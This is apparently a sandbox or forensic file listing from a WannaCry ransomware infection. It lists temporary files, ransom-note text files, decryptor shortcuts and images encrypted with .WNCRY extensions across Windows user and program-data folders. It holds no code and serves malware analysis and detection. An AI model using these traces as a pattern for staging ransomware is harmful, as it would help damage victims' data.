C:\Users\All Users\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\Sysmon\~SD9835.tmp
C:\Users\All Users\Microsoft\Event Viewer\Views\~SD9884.tmp
C:\Users\All Users\Microsoft\Event Viewer\Views\ApplicationViewsRootNode\~SD98F3.tmp
C:\Users\All Users\Microsoft\IdentityCRL\~SD9913.tmp
C:\Users\All Users\Microsoft\Media Player\~SD9924.tmp
C:\Users\All Users\Microsoft\MF\~SD9925.tmp
C:\Users\All Users\Microsoft\Microsoft Security Client\~SD9926.tmp
C:\Users\All Users\Microsoft\Microsoft Security Client\Support\~SD9956.tmp
C:\Users\All Users\Microsoft\NetFramework\~SD9976.tmp
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\~SD99E4.tmp
C:\Users\All Users\Microsoft\Network\~SD9AC0.tmp
C:\Users\All Users\Microsoft\Network\Connections\~SD9B0F.tmp
C:\Users\All Users\Microsoft\Network\Downloader\~SD9B3F.tmp
C:\Users\All Users\Microsoft\Office\~SD9B6F.tmp
C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\~SD9BED.tmp
C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\~SD9C6B.tmp
C:\Users\All Users\Microsoft\RAC\~SD9CCA.tmp
C:\Users\All Users\Microsoft\RAC\Outbound\~SD9D19.tmp
C:\Users\All Users\Microsoft\RAC\PublishedData\~SD9D39.tmp
C:\Users\All Users\Microsoft\RAC\StateData\~SD9DA7.tmp
C:\Users\All Users\Microsoft\RAC\Temp\~SD9DF6.tmp
C:\Users\All Users\Microsoft\Search\~SD9E26.tmp
C:\Users\All Users\Microsoft\Search\Data\~SD9E66.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\~SD9EC5.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\~SD9EC6.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Config\~SD9ED6.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\~SD9ED7.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\~SD9ED8.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\~SD9ED9.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\~SD9EDA.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\~SD9EDB.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\~SD9EDC.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\~SD9EFC.tmp
C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\~SD9EFD.tmp
C:\Users\All Users\Microsoft\Search\Data\Temp\~SD9EFE.tmp
C:\Users\All Users\Microsoft\Search\Data\Temp\usgthrsvc\~SD9F0F.tmp
C:\Users\All Users\Microsoft\User Account Pictures\~SD9F10.tmp
C:\Users\All Users\Microsoft\User Account Pictures\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\User Account Pictures\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\~SD9F11.tmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\Vault\~SD9F12.tmp
C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\~SD9F13.tmp
C:\Users\All Users\Microsoft\Windows\~SD9F24.tmp
C:\Users\All Users\Microsoft\Windows\AIT\~SD9F25.tmp
C:\Users\All Users\Microsoft\Windows\Caches\~SD9F26.tmp
C:\Users\All Users\Microsoft\Windows\Caches\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\Windows\Caches\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\~SD9F27.tmp
C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\~SD9F28.tmp
C:\Users\All Users\Microsoft\Windows\DRM\~SD9F58.tmp
C:\Users\All Users\Microsoft\Windows\DRM\Cache\~SD9F97.tmp
C:\Users\All Users\Microsoft\Windows\GameExplorer\~SD9FE6.tmp
C:\Users\All Users\Microsoft\Windows\Power Efficiency Diagnostics\~SDA035.tmp
C:\Users\All Users\Microsoft\Windows\Ringtones\~SDA0C3.tmp
C:\Users\All Users\Microsoft\Windows\Ringtones\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\Windows\Ringtones\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\Windows\Sqm\~SDA1BE.tmp
C:\Users\All Users\Microsoft\Windows\Sqm\Manifest\~SDA1DE.tmp
C:\Users\All Users\Microsoft\Windows\Sqm\Sessions\~SDA21E.tmp
C:\Users\All Users\Microsoft\Windows\Sqm\Upload\~SDA22E.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\~SDA22F.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\~SDA230.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\7-Zip\~SDA260.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\~SDA2BF.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDA2FE.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDA33E.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\~SDA35E.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\~SDA3AD.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SDA3DD.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoHotkey\~SDA3FD.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Boxstarter\~SDA3FE.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\~SDA40F.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\~SDA420.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDA421.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\~SDA422.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\PowerShell\~SDA432.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 3.8\~SDA433.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SDA434.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\WinRAR\~SDA445.tmp
C:\Users\All Users\Microsoft\Windows\Templates\~SDA456.tmp
C:\Users\All Users\Microsoft\Windows\WER\~SDA4A5.tmp
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\~SDA4F4.tmp
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\~SDA543.tmp
C:\Users\All Users\Microsoft\Windows Defender\~SDA563.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\~SDA583.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Backup\~SDA584.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Updates\~SDA585.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{8AF8DC04-1885-4F22-8F09-BD1E568EBC7A}\~SDA586.tmp
C:\Users\All Users\Microsoft\Windows Defender\LocalCopy\~SDA587.tmp
C:\Users\All Users\Microsoft\Windows Defender\Quarantine\~SDA588.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\~SDA5B8.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\Windows Defender\Scans\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\~SDA694.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\~SDA6F3.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\~SDA742.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\Resource\~SDA791.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\~SDA7D1.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Store\~SDA7D2.tmp
C:\Users\All Users\Microsoft\Windows Defender\Support\~SDA7E2.tmp
C:\Users\All Users\Microsoft\Windows NT\~SDA7E3.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\~SDA7E4.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\ActivityLog\~SDA7E5.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\~SDA7E6.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\~SDA7E7.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Inbox\~SDA7F8.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Queue\~SDA7F9.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\SentItems\~SDA7FA.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\~SDA7FB.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\~SDA7FC.tmp
C:\Users\All Users\Microsoft\Windows NT\MSScan\~SDA7FD.tmp
C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT
C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY
C:\Users\All Users\Microsoft\Windows NT\MSScan\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\Windows NT\MSScan\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\WwanSvc\~SDA83C.tmp
C:\Users\All Users\Microsoft\WwanSvc\Profiles\~SDA83D.tmp
C:\Users\All Users\Microsoft OneDrive\~SDA83E.tmp
C:\Users\All Users\Microsoft OneDrive\setup\~SDA83F.tmp
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\~SDA8CD.tmp
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\~SDA8FD.tmp
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\~SDA95C.tmp
C:\Users\All Users\Oracle\~SDA9AB.tmp
C:\Users\All Users\Oracle\Java\~SDA9FA.tmp
C:\Users\All Users\Oracle\Java\installcache\~SDAA2A.tmp
C:\Users\All Users\Oracle\Java\installcache_x64\~SDAA88.tmp
C:\Users\All Users\Package Cache\~SDAC7D.tmp
C:\Users\All Users\Package Cache\{0627E042-BBD1-4FE2-AAEF-C54BA4A69326}v3.8.10150.0\~SDAD1B.tmp
C:\Users\All Users\Package Cache\{08c3379c-d122-42a4-917e-b3dc470fbcb3}\~SDAD1C.tmp
C:\Users\All Users\Package Cache\{21F60B75-2A5E-4064-A38A-D59A347B4433}v3.8.10150.0\~SDAD1D.tmp
C:\Users\All Users\Package Cache\{2dd73f73-784c-4c71-9495-fd11cd6eddf6}\~SDAD1E.tmp
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\~SDAD3E.tmp
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\~SDAD8D.tmp
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\vcRuntimeMinimum_amd64\~SDADEC.tmp
C:\Users\All Users\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}\~SDAE99.tmp
C:\Users\All Users\Package Cache\{4196628C-AE5C-4304-B166-B7C1E93CDC25}v3.8.10150.0\~SDAF07.tmp
C:\Users\All Users\Package Cache\{4AF94EBC-F592-4502-B0EA-07764E7F820B}v3.8.10150.0\~SDAF47.tmp
C:\Users\All Users\Package Cache\{4CA4F71B-58C3-42ED-83FA-AD7AC9E9C0CB}v48.47.50420\~SDAF96.tmp
C:\Users\All Users\Package Cache\{54DE7EA9-E391-4BD2-A373-3A72A18EBDB5}v40.68.31213\~SDAFE5.tmp
C:\Users\All Users\Package Cache\{59650A2A-3839-46EC-9D9C-6B3B1C743C55}v40.68.31213\~SDB024.tmp
C:\Users\All Users\Package Cache\{5A66E598-37BD-4C8A-A7CB-A71C32ABCD78}v40.68.31213\~SDB054.tmp
C:\Users\All Users\Package Cache\{5E63E49B-C88C-46C5-855C-A7B07C11CDC8}v48.47.50420\~SDB074.tmp
C:\Users\All Users\Package Cache\{81CDF5BF-4777-4CF8-B6CC-0902061F7314}v3.8.7427.0\~SDB0C4.tmp
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\~SDB113.tmp
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\~SDB162.tmp
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\vcRuntimeAdditional_x86\~SDB1A1.tmp
C:\Users\All Users\Package Cache\{8BA25391-0BE6-443A-8EBF-86A29BAFC479}v40.68.31213\~SDB200.tmp
C:\Users\All Users\Package Cache\{94EE74AD-4205-4038-8748-000D966FA407}v48.47.50420\~SDB24F.tmp
C:\Users\All Users\Package Cache\{a699b48e-5748-4980-ad92-0b61b1d9d718}\~SDB26F.tmp
C:\Users\All Users\Package Cache\{a98dc6ff-d360-4878-9f0a-915eba86eaf3}\~SDB2FD.tmp
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\~SDB32D.tmp
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\~SDB34D.tmp
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\vcRuntimeMinimum_x86\~SDB36D.tmp
C:\Users\All Users\Package Cache\{AF01038B-6523-4EA7-9D9E-4F1E2927D88B}v40.68.31213\~SDB3CC.tmp
C:\Users\All Users\Package Cache\{B87AB233-E9C5-4459-8E4A-952EACECCFC4}v48.47.50420\~SDB40C.tmp
C:\Users\All Users\Package Cache\{B92B890A-04F2-4880-BA20-20D4364FB263}v48.47.50420\~SDB42C.tmp
C:\Users\All Users\Package Cache\{C3DD1448-513A-4DB8-978D-6991562EA63D}v48.47.50420\~SDB46B.tmp
C:\Users\All Users\Package Cache\{CD1C027B-BC87-4C8E-993D-1779A12BF141}v3.8.10150.0\~SDB4AB.tmp
C:\Users\All Users\Package Cache\{D9D74D16-6E0C-417B-AA63-557EEED5AED1}v3.8.10150.0\~SDB4CB.tmp
C:\Users\All Users\Package Cache\{DF5D4A27-B019-41FB-ACA8-62EE9947F452}v3.8.10150.0\~SDB50B.tmp
C:\Users\All Users\Package Cache\{E663ED1E-899C-40E8-91D0-8D37B95E3C69}v40.68.31213\~SDB53B.tmp
C:\Users\All Users\Package Cache\{E8900394-218B-459F-98DC-75B0FD88CC80}v3.8.10150.0\~SDB58A.tmp
C:\Users\All Users\Package Cache\{EFDAD3B5-AE93-48A4-BE3E-40EEFC4F100A}v3.8.10150.0\~SDB5BA.tmp
C:\Users\All Users\Package Cache\{efe3bb1e-6444-4bc0-9edd-7e5bae77965b}\~SDB5DA.tmp
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\~SDB639.tmp
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\~SDB659.tmp
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\vcRuntimeAdditional_amd64\~SDB689.tmp
C:\Users\All Users\Package Cache\{F51469FB-F088-479B-BD5A-70A9C557FE6F}v3.8.10150.0\~SDB6C8.tmp
C:\Users\All Users\regid.1991-06.com.microsoft\~SDB727.tmp
C:\Users\All Users\shimgen\~SDB795.tmp
C:\Users\All Users\shimgen\generatedfiles\~SDB7D5.tmp
C:\Users\Default\~SDB7F5.tmp
C:\Users\Default\AppData\~SDB825.tmp
C:\Users\Default\AppData\Local\~SDB836.tmp
C:\Users\Default\AppData\Local\Microsoft\~SDB865.tmp
C:\Users\Default\AppData\Local\Microsoft\Windows\~SDB8A5.tmp
C:\Users\Default\AppData\Local\Microsoft\Windows\GameExplorer\~SDB8E4.tmp
C:\Users\Default\AppData\Local\Microsoft\Windows\History\~SDB905.tmp
C:\Users\Default\AppData\Roaming\~SDB915.tmp
C:\Users\Default\AppData\Roaming\Media Center Programs\~SDB955.tmp
C:\Users\Default\AppData\Roaming\Microsoft\~SDB985.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\~SDB9A5.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SDB9D5.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\~SDBA14.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\~SDBA35.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SDBA64.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SDBA94.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\~SDBAB5.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\~SDBAE4.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\~SDBB14.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SDBB54.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SDBBD2.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SDBBF2.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SDBC22.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDBC52.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\~SDBC53.tmp
C:\Users\Default\Desktop\~SDBC54.tmp
C:\Users\Default\Documents\~SDBC55.tmp
C:\Users\Default\Downloads\~SDBC56.tmp
C:\Users\Default\Favorites\~SDBC57.tmp
C:\Users\Default\Links\~SDBC58.tmp
C:\Users\Default\Music\~SDBC59.tmp
C:\Users\Default\Pictures\~SDBC5A.tmp
C:\Users\Default\Saved Games\~SDBC6A.tmp
C:\Users\Default\Videos\~SDBC6B.tmp
C:\Users\Public\~SDBC6C.tmp
C:\Users\Public\Desktop\~SDBC6D.tmp
C:\Users\Public\Documents\~SDBC6E.tmp
C:\Users\Public\Downloads\~SDBCCD.tmp
C:\Users\Public\Favorites\~SDBCFD.tmp
C:\Users\Public\Libraries\~SDBD1D.tmp
C:\Users\Public\Music\~SDBD5D.tmp
C:\Users\Public\Music\Sample Music\~SDBDBC.tmp
C:\Users\Public\Music\Sample Music\@Please_Read_Me@.txt
C:\Users\Public\Music\Sample Music\@WanaDecryptor@.exe.lnk
C:\Users\Public\Pictures\~SDBE1A.tmp
C:\Users\Public\Pictures\Sample Pictures\~SDBE89.tmp
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRYT
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRY
C:\Users\Public\Pictures\Sample Pictures\@Please_Read_Me@.txt
C:\Users\Public\Pictures\Sample Pictures\@WanaDecryptor@.exe.lnk
C:\Users\Public\Recorded TV\~SDC05E.tmp
C:\Users\Public\Recorded TV\Sample Media\~SDC0AE.tmp
C:\Users\Public\Videos\~SDC0DD.tmp
C:\Users\Public\Videos\Sample Videos\~SDC0EE.tmp
C:\Users\Public\Videos\Sample Videos\@Please_Read_Me@.txt
C:\Users\Public\Videos\Sample Videos\@WanaDecryptor@.exe.lnk
C:\Users\user\~SDC0EF.tmp
C:\Users\user\.ms-ad\~SDC0F0.tmp
C:\Users\user\AppData\~SDC0F1.tmp
C:\Users\user\AppData\Local\~SDC0F2.tmp
C:\Users\user\AppData\Local\@Please_Read_Me@.txt
C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnk
C:\Users\user\AppData\Local\Adobe\~SDC103.tmp
C:\Users\user\AppData\Local\Adobe\Acrobat\~SDC104.tmp
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SDC105.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\~SDC106.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\~SDC116.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\~SDC117.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\~SDC176.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\~SDC1B6.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\fb9136c9-56b8-4a66-aca4-73cc2fd2f175\~SDC214.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\~SDC263.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\~SDC293.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\~SDC2D3.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\~SDC312.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\~SDC342.tmp
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cookie\~SDC391.tmp
C:\Users\user\AppData\Local\Adobe\ARM\~SDC3D1.tmp
C:\Users\user\AppData\Local\Adobe\ARM\S\~SDC3F1.tmp
C:\Users\user\AppData\Local\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\~SDC450.tmp
C:\Users\user\AppData\Local\Adobe\Color\~SDC49F.tmp
C:\Users\user\AppData\Local\Apps\~SDC51D.tmp
C:\Users\user\AppData\Local\Apps\2.0\~SDC54D.tmp
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\~SDC56D.tmp
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\~SDC5BC.tmp
C:\Users\user\AppData\Local\Apps\2.0\0ZVHNN42.ABB\NR814KPV.P8V\manifests\~SDC5EC.tmp
C:\Users\user\AppData\Local\Apps\2.0\Data\~SDC60C.tmp
C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\~SDC66B.tmp
C:\Users\user\AppData\Local\Apps\2.0\Data\CQB0Y326.MOO\M3VCAP6Z.25X\~SDC6AB.tmp
C:\Users\user\AppData\Local\Boxstarter\~SDC6DA.tmp
C:\Users\user\AppData\Local\CEF\~SDC72A.tmp
C:\Users\user\AppData\Local\CEF\User Data\~SDC769.tmp
C:\Users\user\AppData\Local\CEF\User Data\Dictionaries\~SDC799.tmp
C:\Users\user\AppData\Local\Deployment\~SDC7D8.tmp
C:\Users\user\AppData\Local\Google\~SDC828.tmp
C:\Users\user\AppData\Local\Google\Chrome\~SDC867.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\~SDC8C6.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates\~SDC8D6.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\~SDC8D7.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\~SDC8D8.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\~SDC8D9.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\~SDC8DA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\~SDC8DB.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\~SDC8EC.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\~SDC95A.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\~SDC9AA.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\~SDCA08.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\~SDCA57.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\44191681-e6d2-41ed-948c-a2cdae484e83\~SDCAC6.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\~SDCB34.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\~SDCBA3.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\~SDCBE2.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\~SDCC22.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\~SDCC32.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\~SDCC33.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\~SDCC34.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\~SDCC35.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\~SDCC36.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\~SDCC66.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\~SDCC96.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\~SDCCD5.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\~SDCD34.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\~SDCD74.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\~SDCDB3.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\~SDCE02.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\~SDCE51.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\~SDCE91.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\~SDCEB1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\~SDCEE1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\~SDCF01.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\~SDCF22.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\~SDCF71.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\~SDCF91.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\~SDCFB1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\~SDCFE1.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\~SDD04F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\~SDD09F.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\~SDD0DE.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\~SDD10E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\~SDD14D.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\~SDD16E.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\~SDD1AD.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\~SDD1ED.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\~SDD23C.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\~SDD25C.tmp
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\~SDD29C.tmp
